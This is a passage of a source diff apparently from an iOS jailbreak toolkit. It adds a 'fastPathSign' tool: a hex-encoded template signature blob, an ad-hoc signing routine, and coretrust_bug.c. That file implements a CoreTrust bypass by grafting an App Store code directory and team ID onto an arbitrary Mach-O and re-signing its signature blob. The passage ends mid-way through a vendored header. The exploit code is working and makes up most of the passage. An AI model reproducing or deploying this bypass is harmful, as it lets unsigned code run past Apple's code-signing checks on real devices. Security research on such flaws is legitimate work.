0x01, 0x00, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x53, 0x49,
0x47, 0x4e, 0x53, 0x49, 0x47, 0x4e, 0x30, 0x82, 0x03, 0xb1, 0x02, 0x01,
0x01, 0x30, 0x7f, 0x30, 0x73, 0x31, 0x2d, 0x30, 0x2b, 0x06, 0x03, 0x55,
0x04, 0x03, 0x0c, 0x24, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x69, 0x50,
0x68, 0x6f, 0x6e, 0x65, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69,
0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6f,
0x72, 0x69, 0x74, 0x79, 0x31, 0x20, 0x30, 0x1e, 0x06, 0x03, 0x55, 0x04,
0x0b, 0x0c, 0x17, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61,
0x74, 0x69, 0x6f, 0x6e, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6f, 0x72, 0x69,
0x74, 0x79, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x0c,
0x0a, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x49, 0x6e, 0x63, 0x2e, 0x31,
0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53,
0x02, 0x08, 0x40, 0x60, 0x57, 0xb3, 0xc9, 0xbf, 0x9d, 0xf0, 0x30, 0x0d,
0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x05,
0x00, 0xa0, 0x82, 0x02, 0x07, 0x30, 0x18, 0x06, 0x09, 0x2a, 0x86, 0x48,
0x86, 0xf7, 0x0d, 0x01, 0x09, 0x03, 0x31, 0x0b, 0x06, 0x09, 0x2a, 0x86,
0x48, 0x86, 0xf7, 0x0d, 0x01, 0x07, 0x01, 0x30, 0x2f, 0x06, 0x09, 0x2a,
0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x09, 0x04, 0x31, 0x22, 0x04, 0x20,
0xc2, 0x96, 0x8f, 0x4a, 0x63, 0xc0, 0xcf, 0xb6, 0xcd, 0x82, 0xb8, 0x48,
0xe2, 0x04, 0x3d, 0xa0, 0x71, 0xfe, 0xa3, 0x66, 0x32, 0x8c, 0xb4, 0xe0,
0x94, 0x12, 0xdb, 0xb5, 0x73, 0x96, 0xc4, 0xc4, 0x30, 0x5b, 0x06, 0x09,
0x2a, 0x86, 0x48, 0x86, 0xf7, 0x63, 0x64, 0x09, 0x02, 0x31, 0x4e, 0x30,
0x1d, 0x06, 0x05, 0x2b, 0x0e, 0x03, 0x02, 0x1a, 0x04, 0x14, 0x51, 0xf9,
0xbc, 0xa2, 0x95, 0xbe, 0x9c, 0x2e, 0x1d, 0xee, 0x77, 0xd0, 0x93, 0xce,
0x0f, 0xcf, 0x3f, 0xc9, 0x34, 0x50, 0x30, 0x2d, 0x06, 0x09, 0x60, 0x86,
0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x04, 0x20, 0x93, 0x72, 0x19,
0xc3, 0x98, 0x18, 0xd7, 0x7d, 0x0c, 0x7b, 0x93, 0x6c, 0xba, 0xd6, 0x2c,
0xa4, 0x4c, 0x44, 0xb7, 0xa4, 0xaa, 0x7c, 0x50, 0x40, 0x93, 0x6f, 0x30,
0xb3, 0xe1, 0x19, 0xb0, 0x40, 0x30, 0x82, 0x01, 0x5b, 0x06, 0x09, 0x2a,
0x86, 0x48, 0x86, 0xf7, 0x63, 0x64, 0x09, 0x01, 0x31, 0x82, 0x01, 0x4c,
0x04, 0x82, 0x01, 0x48, 0x3c, 0x3f, 0x78, 0x6d, 0x6c, 0x20, 0x76, 0x65,
0x72, 0x73, 0x69, 0x6f, 0x6e, 0x3d, 0x22, 0x31, 0x2e, 0x30, 0x22, 0x20,
0x65, 0x6e, 0x63, 0x6f, 0x64, 0x69, 0x6e, 0x67, 0x3d, 0x22, 0x55, 0x54,
0x46, 0x2d, 0x38, 0x22, 0x3f, 0x3e, 0x0a, 0x3c, 0x21, 0x44, 0x4f, 0x43,
0x54, 0x59, 0x50, 0x45, 0x20, 0x70, 0x6c, 0x69, 0x73, 0x74, 0x20, 0x50,
0x55, 0x42, 0x4c, 0x49, 0x43, 0x20, 0x22, 0x2d, 0x2f, 0x2f, 0x41, 0x70,
0x70, 0x6c, 0x65, 0x2f, 0x2f, 0x44, 0x54, 0x44, 0x20, 0x50, 0x4c, 0x49,
0x53, 0x54, 0x20, 0x31, 0x2e, 0x30, 0x2f, 0x2f, 0x45, 0x4e, 0x22, 0x20,
0x22, 0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x77, 0x77, 0x77, 0x2e,
0x61, 0x70, 0x70, 0x6c, 0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x44, 0x54,
0x44, 0x73, 0x2f, 0x50, 0x72, 0x6f, 0x70, 0x65, 0x72, 0x74, 0x79, 0x4c,
0x69, 0x73, 0x74, 0x2d, 0x31, 0x2e, 0x30, 0x2e, 0x64, 0x74, 0x64, 0x22,
0x3e, 0x0a, 0x3c, 0x70, 0x6c, 0x69, 0x73, 0x74, 0x20, 0x76, 0x65, 0x72,
0x73, 0x69, 0x6f, 0x6e, 0x3d, 0x22, 0x31, 0x2e, 0x30, 0x22, 0x3e, 0x0a,
0x3c, 0x64, 0x69, 0x63, 0x74, 0x3e, 0x0a, 0x09, 0x3c, 0x6b, 0x65, 0x79,
0x3e, 0x63, 0x64, 0x68, 0x61, 0x73, 0x68, 0x65, 0x73, 0x3c, 0x2f, 0x6b,
0x65, 0x79, 0x3e, 0x0a, 0x09, 0x3c, 0x61, 0x72, 0x72, 0x61, 0x79, 0x3e,
0x0a, 0x09, 0x09, 0x3c, 0x64, 0x61, 0x74, 0x61, 0x3e, 0x0a, 0x09, 0x09,
0x55, 0x66, 0x6d, 0x38, 0x6f, 0x70, 0x57, 0x2b, 0x6e, 0x43, 0x34, 0x64,
0x37, 0x6e, 0x66, 0x51, 0x6b, 0x38, 0x34, 0x50, 0x7a, 0x7a, 0x2f, 0x4a,
0x4e, 0x46, 0x41, 0x3d, 0x0a, 0x09, 0x09, 0x3c, 0x2f, 0x64, 0x61, 0x74,
0x61, 0x3e, 0x0a, 0x09, 0x09, 0x3c, 0x64, 0x61, 0x74, 0x61, 0x3e, 0x0a,
0x09, 0x09, 0x6b, 0x33, 0x49, 0x5a, 0x77, 0x35, 0x67, 0x59, 0x31, 0x33,
0x30, 0x4d, 0x65, 0x35, 0x4e, 0x73, 0x75, 0x74, 0x59, 0x73, 0x70, 0x45,
0x78, 0x45, 0x74, 0x36, 0x51, 0x3d, 0x0a, 0x09, 0x09, 0x3c, 0x2f, 0x64,
0x61, 0x74, 0x61, 0x3e, 0x0a, 0x09, 0x3c, 0x2f, 0x61, 0x72, 0x72, 0x61,
0x79, 0x3e, 0x0a, 0x3c, 0x2f, 0x64, 0x69, 0x63, 0x74, 0x3e, 0x0a, 0x3c,
0x2f, 0x70, 0x6c, 0x69, 0x73, 0x74, 0x3e, 0x0a, 0x30, 0x0d, 0x06, 0x09,
0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00, 0x04,
0x82, 0x01, 0x00, 0x3b, 0x3d, 0x60, 0x8d, 0xa2, 0x95, 0x1e, 0x5b, 0xa6,
0x02, 0xb4, 0x71, 0xc3, 0xfa, 0x01, 0xf0, 0x1c, 0x1f, 0x15, 0x8d, 0xf0,
0x15, 0xcb, 0x76, 0x6a, 0xfd, 0xb4, 0x95, 0x14, 0x6f, 0xea, 0x4c, 0x1b,
0xf1, 0x32, 0x80, 0xe7, 0x97, 0x04, 0x00, 0x07, 0x4d, 0x86, 0x73, 0xbe,
0x5c, 0xd4, 0x13, 0xe4, 0x31, 0xb7, 0x94, 0xc0, 0x6a, 0xf9, 0x4a, 0x48,
0x7a, 0x44, 0xde, 0x67, 0xc8, 0xb2, 0xcd, 0xed, 0x2c, 0xff, 0x80, 0xec,
0x96, 0xc1, 0x2e, 0x37, 0x13, 0x67, 0x1b, 0xa3, 0x54, 0x63, 0x88, 0x84,
0x5d, 0x1a, 0xca, 0xc9, 0x58, 0xec, 0xca, 0x82, 0x38, 0x8d, 0x29, 0x1c,
0xca, 0x58, 0x50, 0xc4, 0xd0, 0x91, 0xba, 0x22, 0x7e, 0x73, 0x00, 0x58,
0x48, 0x5d, 0x49, 0xbd, 0xe7, 0xde, 0x35, 0x23, 0xfa, 0x60, 0x93, 0x12,
0x98, 0x2f, 0xf6, 0x8b, 0x38, 0x54, 0x32, 0x75, 0x0a, 0x3b, 0xed, 0x7f,
0x6a, 0x78, 0xf7, 0x87, 0x30, 0x49, 0xf4, 0x1f, 0x0d, 0x0a, 0x8b, 0xb7,
0xa7, 0x7e, 0x69, 0x48, 0x34, 0x6c, 0x9b, 0x77, 0xce, 0x0e, 0x68, 0xd9,
0x30, 0xb2, 0xc6, 0xa3, 0x30, 0x8a, 0x87, 0xd9, 0x25, 0xd7, 0x58, 0xc1,
0xae, 0x33, 0x4f, 0xeb, 0x2c, 0xcb, 0xf2, 0xb2, 0xe8, 0x2d, 0xa9, 0x4c,
0xa8, 0xd8, 0x64, 0x8b, 0x91, 0xdc, 0xb6, 0x55, 0x69, 0x84, 0x43, 0x4b,
0x75, 0xe6, 0xba, 0xd6, 0x58, 0x5b, 0x5e, 0xe7, 0x91, 0x5a, 0x69, 0x9b,
0xb6, 0x45, 0x7f, 0x1a, 0x9f, 0x0b, 0x87, 0xac, 0x4c, 0xc8, 0x58, 0x59,
0x18, 0x25, 0x02, 0x6c, 0xb2, 0x66, 0xf1, 0x2c, 0xc7, 0xaf, 0x68, 0x7a,
0x0e, 0x82, 0x93, 0x27, 0xd8, 0x75, 0x01, 0xdf, 0xd4, 0xa7, 0xba, 0xa5,
0x6e, 0xb2, 0x16, 0x49, 0x9a, 0xef, 0xdf, 0xec, 0xa7, 0x15, 0x78, 0x05,
0x68, 0x37, 0xaf, 0xf6, 0xfb, 0xa9, 0x3b, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00
};
unsigned int TemplateSignatureBlob_len = 6613;

3
Exploits/fastPathSign/src/adhoc.h Normal file
View File

@ -0,0 +1,3 @@
#include <stdbool.h>
int binary_sign_adhoc(char *path, bool preserveMetadata);

140
Exploits/fastPathSign/src/adhoc.m Normal file
View File

@ -0,0 +1,140 @@
#include <Foundation/Foundation.h>
#include <Security/Security.h>
#include <TargetConditionals.h>
#ifdef __cplusplus
extern "C" {
#endif
#if TARGET_OS_OSX
#include <Security/SecCode.h>
#include <Security/SecStaticCode.h>
#else
// CSCommon.h
typedef struct CF_BRIDGED_TYPE(id) __SecCode const* SecStaticCodeRef; /* code on disk */
typedef CF_OPTIONS(uint32_t, SecCSFlags) {
kSecCSDefaultFlags = 0, /* no particular flags (default behavior) */
kSecCSConsiderExpiration = 1U << 31, /* consider expired certificates invalid */
kSecCSEnforceRevocationChecks = 1 << 30, /* force revocation checks regardless of preference settings */
kSecCSNoNetworkAccess = 1 << 29, /* do not use the network, cancels "kSecCSEnforceRevocationChecks" */
kSecCSReportProgress = 1 << 28, /* make progress report call-backs when configured */
kSecCSCheckTrustedAnchors = 1 << 27, /* build certificate chain to system trust anchors, not to any self-signed certificate */
kSecCSQuickCheck = 1 << 26, /* (internal) */
kSecCSApplyEmbeddedPolicy = 1 << 25, /* Apply Embedded (iPhone) policy regardless of the platform we're running on */
};
// SecStaticCode.h
OSStatus SecStaticCodeCreateWithPathAndAttributes(CFURLRef path, SecCSFlags flags, CFDictionaryRef attributes,
SecStaticCodeRef* __nonnull CF_RETURNS_RETAINED staticCode);
// SecCode.h
CF_ENUM(uint32_t){
kSecCSInternalInformation = 1 << 0, kSecCSSigningInformation = 1 << 1, kSecCSRequirementInformation = 1 << 2,
kSecCSDynamicInformation = 1 << 3, kSecCSContentInformation = 1 << 4, kSecCSSkipResourceDirectory = 1 << 5,
kSecCSCalculateCMSDigest = 1 << 6,
};
OSStatus SecCodeCopySigningInformation(SecStaticCodeRef code, SecCSFlags flags, CFDictionaryRef* __nonnull CF_RETURNS_RETAINED information);
extern const CFStringRef kSecCodeInfoEntitlements; /* generic */
extern const CFStringRef kSecCodeInfoIdentifier; /* generic */
extern const CFStringRef kSecCodeInfoRequirementData; /* Requirement */
#endif
typedef CF_OPTIONS(uint32_t, SecPreserveFlags) {
kSecCSPreserveIdentifier = 1 << 0,
kSecCSPreserveRequirements = 1 << 1,
kSecCSPreserveEntitlements = 1 << 2,
kSecCSPreserveResourceRules = 1 << 3,
kSecCSPreserveFlags = 1 << 4,
kSecCSPreserveTeamIdentifier = 1 << 5,
kSecCSPreserveDigestAlgorithm = 1 << 6,
kSecCSPreservePreEncryptHashes = 1 << 7,
kSecCSPreserveRuntime = 1 << 8,
};
// SecCodeSigner.h
#ifdef BRIDGED_SECCODESIGNER
typedef struct CF_BRIDGED_TYPE(id) __SecCodeSigner* SecCodeSignerRef SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
#else
typedef struct __SecCodeSigner* SecCodeSignerRef SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
#endif
extern const CFStringRef kSecCodeSignerEntitlements SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
extern const CFStringRef kSecCodeSignerIdentifier SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
extern const CFStringRef kSecCodeSignerIdentity SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
extern const CFStringRef kSecCodeSignerPreserveMetadata SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
extern const CFStringRef kSecCodeSignerRequirements SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
extern const CFStringRef kSecCodeSignerResourceRules SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
#ifdef BRIDGED_SECCODESIGNER
OSStatus SecCodeSignerCreate(CFDictionaryRef parameters, SecCSFlags flags, SecCodeSignerRef* __nonnull CF_RETURNS_RETAINED signer)
SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
#else
OSStatus SecCodeSignerCreate(CFDictionaryRef parameters, SecCSFlags flags, SecCodeSignerRef* signer)
SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
#endif
OSStatus SecCodeSignerAddSignatureWithErrors(SecCodeSignerRef signer, SecStaticCodeRef code, SecCSFlags flags, CFErrorRef* errors)
SPI_AVAILABLE(macos(10.5), ios(15.0), macCatalyst(13.0));
// SecCodePriv.h
extern const CFStringRef kSecCodeInfoResourceDirectory; /* Internal */
#ifdef __cplusplus
}
#endif
int binary_sign_adhoc(char *path, bool preserveMetadata)
{
NSString *filePath = [NSString stringWithUTF8String:path];
OSStatus status = 0;
int retval = 200;
// the special value "-" (dash) indicates ad-hoc signing
SecIdentityRef identity = (SecIdentityRef)kCFNull;
NSMutableDictionary* parameters = [[NSMutableDictionary alloc] init];
parameters[(__bridge NSString*)kSecCodeSignerIdentity] = (__bridge id)identity;
if (preserveMetadata) {
parameters[(__bridge NSString*)kSecCodeSignerPreserveMetadata] = @(kSecCSPreserveIdentifier | kSecCSPreserveRequirements | kSecCSPreserveEntitlements | kSecCSPreserveResourceRules);
}
SecCodeSignerRef signerRef;
status = SecCodeSignerCreate((__bridge CFDictionaryRef)parameters, kSecCSDefaultFlags, &signerRef);
if (status == 0) {
SecStaticCodeRef code;
status = SecStaticCodeCreateWithPathAndAttributes((__bridge CFURLRef)[NSURL fileURLWithPath:filePath], kSecCSDefaultFlags, (__bridge CFDictionaryRef)@{}, &code);
if (status == 0) {
CFErrorRef errors;
status = SecCodeSignerAddSignatureWithErrors(signerRef, code, kSecCSDefaultFlags, &errors);
if (status == 0) {
CFDictionaryRef newSigningInformation;
// Difference from codesign: added kSecCSSigningInformation, kSecCSRequirementInformation, kSecCSInternalInformation
status = SecCodeCopySigningInformation(code, kSecCSDefaultFlags | kSecCSSigningInformation | kSecCSRequirementInformation | kSecCSInternalInformation, &newSigningInformation);
if (status == 0) {
retval = 0;
CFRelease(newSigningInformation);
} else {
retval = 203;
}
}
else {
printf("Error while signing: %s\n", ((__bridge NSError *)errors).description.UTF8String);
}
CFRelease(code);
}
else {
retval = 202;
}
CFRelease(signerRef);
}
else {
retval = 201;
}
return retval;
}

249
Exploits/fastPathSign/src/coretrust_bug.c Normal file
View File

@ -0,0 +1,249 @@
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <dirent.h>
#include <sys/stat.h>
#include <choma/CSBlob.h>
#include <choma/MachOByteOrder.h>
#include <choma/MachO.h>
#include <choma/Host.h>
#include <choma/MemoryStream.h>
#include <choma/FileStream.h>
#include <choma/BufferedStream.h>
#include <choma/Signing.h>
#include <choma/SignOSSL.h>
#include <choma/CodeDirectory.h>
#include <choma/Base64.h>
#include "Templates/AppStoreCodeDirectory.h"
#include "Templates/SignatureBlob.h"
#include "Templates/DecryptedSignature.h"
// We can use static offsets here because we use a template signature blob
#define SIGNED_ATTRS_OFFSET 0x12DE // SignedAttributes sequence
#define HASHHASH_OFFSET 0x1388 // SHA256 hash SignedAttribute
#define BASEBASE_OFFSET 0x14C5 // Base64 hash SignedAttribute
#define SIGNSIGN_OFFSET 0x151A // Signature
#define DECRYPTED_SIGNATURE_HASH_OFFSET 0x13
int update_signature_blob(CS_DecodedSuperBlob *superblob)
{
CS_DecodedBlob *sha256CD = csd_superblob_find_blob(superblob, CSSLOT_ALTERNATE_CODEDIRECTORIES, NULL);
if (!sha256CD) {
printf("Could not find CodeDirectory blob!\n");
return -1;
}
CS_DecodedBlob *signatureBlob = csd_superblob_find_blob(superblob, CSSLOT_SIGNATURESLOT, NULL);
if (!signatureBlob) {
printf("Could not find signature blob!\n");
return -1;
}
uint8_t fullHash[CC_SHA256_DIGEST_LENGTH];
size_t dataSizeToRead = csd_blob_get_size(sha256CD);
uint8_t *data = malloc(dataSizeToRead);
memset(data, 0, dataSizeToRead);
csd_blob_read(sha256CD, 0, dataSizeToRead, data);
CC_SHA256(data, (CC_LONG)dataSizeToRead, fullHash);
free(data);
uint8_t secondCDSHA256Hash[CC_SHA256_DIGEST_LENGTH];
memcpy(secondCDSHA256Hash, fullHash, CC_SHA256_DIGEST_LENGTH);
// Print the hash
printf("SHA256 hash: ");
for (int i = 0; i < CC_SHA256_DIGEST_LENGTH; i++) {
printf("%02x", secondCDSHA256Hash[i]);
}
printf("\n");
size_t base64OutLength = 0;
char *newBase64Hash = base64_encode(secondCDSHA256Hash, CC_SHA1_DIGEST_LENGTH, &base64OutLength);
if (!newBase64Hash) {
printf("Failed to base64 encode hash!\n");
return -1;
}
// Print the base64 hash
printf("Base64 hash: %.*s\n", CC_SHA256_DIGEST_LENGTH, newBase64Hash);
int ret = csd_blob_write(signatureBlob, HASHHASH_OFFSET, CC_SHA256_DIGEST_LENGTH, secondCDSHA256Hash);
if (ret != 0) {
printf("Failed to write SHA256 hash to signature blob!\n");
free(newBase64Hash);
return -1;
}
ret = csd_blob_write(signatureBlob, BASEBASE_OFFSET, base64OutLength, newBase64Hash);
if (ret != 0) {
printf("Failed to write base64 hash to signature blob!\n");
free(newBase64Hash);
return -1;
}
free(newBase64Hash);
unsigned char *newSignature = NULL;
size_t newSignatureSize = 0;
unsigned char newDecryptedSignature[0x33];
memset(newDecryptedSignature, 0, 0x33);
memcpy(newDecryptedSignature, DecryptedSignature, 0x33);
// Get the signed attributes hash
unsigned char signedAttrs[0x229];
memset(signedAttrs, 0, 0x229);
csd_blob_read(signatureBlob, SIGNED_ATTRS_OFFSET, 0x229, signedAttrs);
signedAttrs[0] = 0x31;
// Hash
uint8_t fullAttributesHash[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(signedAttrs, (CC_LONG)0x229, fullAttributesHash);
memcpy(newDecryptedSignature + DECRYPTED_SIGNATURE_HASH_OFFSET, fullAttributesHash, CC_SHA256_DIGEST_LENGTH);
newSignature = signWithRSA(newDecryptedSignature, DecryptedSignature_len, &newSignatureSize);
if (!newSignature) {
printf("Failed to sign the decrypted signature!\n");
return -1;
}
if (newSignatureSize != 0x100) {
printf("The new signature is not the correct size!\n");
free(newSignature);
return -1;
}
ret = csd_blob_write(signatureBlob, SIGNSIGN_OFFSET, newSignatureSize, newSignature);
free(newSignature);
return ret;
}
int apply_coretrust_bypass(const char *machoPath)
{
MachO *macho = macho_init_for_writing(machoPath);
if (!macho) return -1;
CS_SuperBlob *superblob = macho_read_code_signature(macho);
if (!superblob) {
printf("Error: no code signature found, please fake-sign the binary at minimum before running the bypass.\n");
return -1;
}
CS_DecodedSuperBlob *decodedSuperblob = csd_superblob_decode(superblob);
uint64_t originalCodeSignatureSize = BIG_TO_HOST(superblob->length);
free(superblob);
CS_DecodedBlob *realCodeDirBlob = NULL;
CS_DecodedBlob *mainCodeDirBlob = csd_superblob_find_blob(decodedSuperblob, CSSLOT_CODEDIRECTORY, NULL);
CS_DecodedBlob *alternateCodeDirBlob = csd_superblob_find_blob(decodedSuperblob, CSSLOT_ALTERNATE_CODEDIRECTORIES, NULL);
if (!mainCodeDirBlob) {
printf("Error: Unable to find code directory, make sure the input binary is ad-hoc signed?\n");
return -1;
}
// We need to determine which code directory to transfer to the new binary
if (alternateCodeDirBlob) {
// If an alternate code directory exists, use that and remove the main one from the superblob
realCodeDirBlob = alternateCodeDirBlob;
csd_superblob_remove_blob(decodedSuperblob, mainCodeDirBlob);
csd_blob_free(mainCodeDirBlob);
}
else {
// Otherwise use the main code directory
realCodeDirBlob = mainCodeDirBlob;
}
CS_CodeDirectory *realCD = malloc(sizeof(CS_CodeDirectory));
csd_blob_read(realCodeDirBlob, 0, sizeof(CS_CodeDirectory), realCD);
CODE_DIRECTORY_APPLY_BYTE_ORDER(realCD, BIG_TO_HOST_APPLIER);
if (realCD->hashType != CS_HASHTYPE_SHA256_256) {
printf("Error: Alternate code directory is not SHA256, bypass won't work!\n");
return -1;
}
printf("Applying App Store code directory...\n");
// Append real code directory as alternateCodeDirectory at the end of superblob
csd_superblob_remove_blob(decodedSuperblob, realCodeDirBlob);
csd_blob_set_type(realCodeDirBlob, CSSLOT_ALTERNATE_CODEDIRECTORIES);
csd_superblob_append_blob(decodedSuperblob, realCodeDirBlob);
// Insert AppStore code directory as main code directory at the start
CS_DecodedBlob *appStoreCodeDirectoryBlob = csd_blob_init(CSSLOT_CODEDIRECTORY, (CS_GenericBlob *)AppStoreCodeDirectory);
csd_superblob_insert_blob_at_index(decodedSuperblob, appStoreCodeDirectoryBlob, 0);
printf("Adding new signature blob...\n");
CS_DecodedBlob *signatureBlob = csd_superblob_find_blob(decodedSuperblob, CSSLOT_SIGNATURESLOT, NULL);
if (signatureBlob) {
// Remove existing signatureBlob if existant
csd_superblob_remove_blob(decodedSuperblob, signatureBlob);
csd_blob_free(signatureBlob);
}
// Append new template blob
signatureBlob = csd_blob_init(CSSLOT_SIGNATURESLOT, (CS_GenericBlob *)TemplateSignatureBlob);
csd_superblob_append_blob(decodedSuperblob, signatureBlob);
// After Modification:
// 1. App Store CodeDirectory (SHA1)
// ?. Requirements
// ?. Entitlements
// ?. DER entitlements
// 5. Actual CodeDirectory (SHA256)
// 6. Signature blob
printf("Updating TeamID...\n");
// Get team ID from AppStore code directory
// For the bypass to work, both code directories need to have the same team ID
char *appStoreTeamID = csd_code_directory_copy_team_id(appStoreCodeDirectoryBlob, NULL);
if (!appStoreTeamID) {
printf("Error: Unable to determine AppStore Team ID\n");
return -1;
}
// Set the team ID of the real code directory to the AppStore one
if (csd_code_directory_set_team_id(realCodeDirBlob, appStoreTeamID) != 0) {
printf("Error: Failed to set Team ID\n");
return -1;
}
printf("TeamID set to %s!\n", appStoreTeamID);
free(appStoreTeamID);
// Set flags to 0 to remove any problematic flags (such as the 'adhoc' flag in bit 2)
csd_code_directory_set_flags(realCodeDirBlob, 0);
printf("Encoding unsigned superblob...\n");
CS_SuperBlob *encodedSuperblobUnsigned = csd_superblob_encode(decodedSuperblob);
printf("Updating load commands...\n");
if (update_load_commands_for_coretrust_bypass(macho, encodedSuperblobUnsigned, originalCodeSignatureSize, memory_stream_get_size(macho->stream)) != 0) {
printf("Error: failed to update load commands!\n");
return -1;
}
free(encodedSuperblobUnsigned);
printf("Updating code slot hashes...\n");
csd_code_directory_update(realCodeDirBlob, macho);
int ret = 0;
printf("Signing binary...\n");
ret = update_signature_blob(decodedSuperblob);
if(ret == -1) {
printf("Error: failed to create new signature blob!\n");
return -1;
}
printf("Encoding signed superblob...\n");
CS_SuperBlob *newSuperblob = csd_superblob_encode(decodedSuperblob);
printf("Writing superblob to MachO...\n");
// Write the new signed superblob to the MachO
macho_replace_code_signature(macho, newSuperblob);
csd_superblob_free(decodedSuperblob);
free(newSuperblob);
macho_free(macho);
return 0;
}

1
Exploits/fastPathSign/src/coretrust_bug.h Normal file
View File

@ -0,0 +1 @@
int apply_coretrust_bypass(const char *machoPath);

0
Exploits/fastPathSign/src/external/.gitignore vendored Normal file
View File

11
Exploits/fastPathSign/src/external/include/choma/Base64.h vendored Normal file
View File

@ -0,0 +1,11 @@
#ifndef BASE64_H
#define BASE64_H
#include <stdint.h>
#include <stdlib.h>
char *base64_encode(const unsigned char *data,
size_t input_length,
size_t *output_length);
#endif // BASE64_H

19
Exploits/fastPathSign/src/external/include/choma/BufferedStream.h vendored Normal file
View File

@ -0,0 +1,19 @@
#ifndef BUFFERED_STREAM_H
#define BUFFERED_STREAM_H
#include "MemoryStream.h"
#include <stdbool.h>
#define BUFFERED_STREAM_FLAG_AUTO_EXPAND (1 << 0)
typedef struct BufferedStreamContext {
uint8_t *buffer;
size_t bufferSize;
uint32_t subBufferStart;
size_t subBufferSize;
} BufferedStreamContext;
MemoryStream *buffered_stream_init_from_buffer_nocopy(void *buffer, size_t bufferSize, uint32_t flags);
MemoryStream *buffered_stream_init_from_buffer(void *buffer, size_t bufferSize, uint32_t flags);
#endif // BUFFERED_STREAM_H

108
Exploits/fastPathSign/src/external/include/choma/CSBlob.h vendored Normal file
View File

@ -0,0 +1,108 @@
#ifndef CS_BLOB_H
#define CS_BLOB_H
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdbool.h>
#include "FAT.h"
#include "MachO.h"
#include "MemoryStream.h"
// Blob index
typedef struct __BlobIndex {
uint32_t type;
uint32_t offset;
} CS_BlobIndex;
// CMS superblob
typedef struct __SuperBlob {
uint32_t magic;
uint32_t length;
uint32_t count;
CS_BlobIndex index[];
} CS_SuperBlob;
typedef struct __GenericBlob {
uint32_t magic; /* magic number */
uint32_t length; /* total length of blob */
char data[];
} CS_GenericBlob;
// CMS blob magic types
enum {
CSBLOB_REQUIREMENT = 0xfade0c00,
CSBLOB_REQUIREMENTS = 0xfade0c01,
CSBLOB_CODEDIRECTORY = 0xfade0c02,
CSBLOB_EMBEDDED_SIGNATURE = 0xfade0cc0,
